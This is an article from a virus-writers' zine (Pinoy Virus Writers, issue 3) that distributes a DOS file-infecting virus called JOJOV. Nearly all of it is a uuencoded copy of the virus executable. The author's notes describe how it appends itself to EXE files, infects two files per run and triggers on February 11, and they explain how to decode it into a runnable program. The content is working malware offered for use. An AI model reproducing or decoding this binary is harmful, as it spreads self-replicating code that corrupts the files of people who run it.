  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ [ Pinoy Virus Writers ] ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  PVW3.008                   Issue No. 3

    ***************************************************************
                An Example of an Appending Virus #2
                           - Zoom23
    ***************************************************************

Note : I already released an example in issue #2 .

þ Virus Name : JOJOV
þ Author : Zoom23
þ URL   : Http://members.tripod.com/~brianjan/virii.htm
þ Notes : Appending EXE file non-resident run-time virus .
          Infects 2 files in current directory .
          Trigger Date on every Feb 11 .
þ Covert to an executable with UUdecode.com
þ If you don't have UUdecode.com you can download it from here :

    http://members.xoom.com/Zoom23/uudecode.com
    http://memebers.tripod.com/~brianjan/uudecode.com
þ I wrote this virus for my friend Jojo long live brother!
þ I have also included the UUdec.com so u wont have to download it.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ [ Cut here ] ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644 jojov.exe
M35I@``H`1P`4`"\#+P/!`P`(```5!0``'````&P```!Z````M0```+H```#(
M````WP```.D```#N````]P```!L!```E`0``-`$``#D!``!'`0``:`$``'8!
M``")`0``C@$``)P!``"J`0``R0$``.`!``#_`0``"0(``!D"```P`@``.@(`
M`#\"``!.`@``4P(``&8"``!K`@``>0(``(<"``">`@``O0(``-0"``#M`@``
M!`,```X#```L`P``.@,``%,#``!J`P``?@,``(@#``#+`P``V0,``.<#``#^
M`P``#@0``"4$```W!```3@0``&<$``!^!```B`0``*P$``#/!```Y@0``!@%
M```N!0``C04``#T!60`!`'(`&P%R`+4"<@#1"'(`[`AR``()<@`A"7(`````
M``````!5B>6#[`;$?@0FB@6(1OV*1OV(1ONP`3I&^W<UB$;^ZP/^1OZ*1OXP
MY,1^!`/X)HH%,.0M/@"(1O^*5O^*1OXPY,1^!`/X)H@5BD;^.D;[==")[%W"
M!``!(%6)Y8'L`@*-O@#_%E<QP%":_05R`+_>`AY7N$\`4)J?!G(`H`,`HNTH
MH`0`HNXHH`4`HN\HH`8`HO`HH`<`HO$H,<"CP"C&!MX!`+]>`1Y7C;X`_Q97
M,<!0FOT%<@":/P1R`+]>`1Y7N`$`4)IZ!'(`OUX!'E>_``0>5[A@$E`QP%!0
MFF4%<@"_7@$>5YK[!'(`FDP&<@`)P'1=FDP&<@")1OZX`0`[1OY_3:,N`^L$
M_P8N`XV^_OX65[_>`1Y7FH4&<@"_5P`.5YH$!W(`C;[^_197_S8N`YK]!7(`
MF@0'<@"_W@$>5[C_`%":GP9R`*$N`SM&_G6XB>Q=PU6)Y8'L``&-O@#_%E<Q
MP%":_05R`+@_`%"_PB@>5YI"`%D`OUX!'E>-O@#_%E<QP%":_05R`)H_!'(`
MOUX!'E>X(`!0FB0`60"_7@$>5[@!`%":>@1R`+]>`1Y7H=PHBQ;>*"U@$H/:
M`"T%`(/:`%)0FLT%<@"_7@$>5[]@%AY7N&`24#'`4%":905R`+]>`1Y7H=PH
MBQ;>*"U@$H/:`"T%`(/:`%)0FLT%<@"_7@$>5YK?!'(`OUX!'E<QP#'24E":
MS05R`+]>`1Y7OV`6'E>X8!)0,<!04)IL!7(`OUX!'E>:^P1R`)I7`5D`O]X"
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
MZ3/`_/.KPP`````````````````%2D]*3U8```````````````````````#_
M_P``````````````````````````````````````````````````````````
8`!!```"@`+``N````@``````````````
`
end
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ [ Cut here ] ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
WARNING : Handle With Care - Virus Inside.
                                               -(C) Zoom23
